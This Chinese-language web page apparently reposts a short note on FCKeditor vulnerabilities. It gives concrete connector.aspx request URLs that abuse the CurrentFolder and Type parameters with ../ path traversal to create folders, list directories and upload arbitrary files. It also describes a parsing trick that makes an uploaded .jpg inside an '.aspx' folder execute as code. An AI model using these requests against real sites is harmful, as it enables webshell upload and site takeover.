• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    FCKeditor 新闻组件的一些程序漏洞
    1 CurrentFolder 参数,可以在网站中不同目录新建文件夹,参数使用 ../../来篡改参数,进入不同的目录
    /browser/default/connectors/aspx/connector.aspx?Command=CreateFolderType=ImageCurrentFolder=../../..%2FNewFolderName=aspx.asp


    2 CurrentFolder 参数,根据返回的XML信息可以查看网站所有的目录,比如 “../../../”进入不同的目录,让后通过XML返回的消息就可以看到没有权限的页面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFilesType=ImageCurrentFolder=%2F

    3 上传文件时,通过修改CurrentFolder参数,可以将文件上传到不同的目录
    /browser/default/connectors/aspx/connector.aspx?Command=FileUploadType=ImageCurrentFolder=%2F

    4 同时修改Type 和CurrentFolder 参数,可以上传任意类型文件到网站任意目录,基本上网站就完蛋了。
    /browser/default/connectors/aspx/connector.aspx?Command=FileUploadType=ImageCurrentFolder=%2F

    http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp



    5 通过创建文件夹的功能,创建名字带有.aspx的文件夹,如:file.aspx等,利用文件解析漏洞,在该文件夹下上传有代码的.jpg 或.rar等文件(实际文件是.aspx,把文件名该后缀),上传之后就可以利用漏洞执行代码了。 如:www.xxx.com/upload/file.aspx/123.jpg 输入之后,代码被成功执行。
    上一篇:fckeditor php上传文件重命名的设置
    下一篇:FckEditor 配置手册中文教程详细说明
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    FCKeditor 新闻组件的一些程序漏洞 FCKeditor,新闻,组件,的,一些,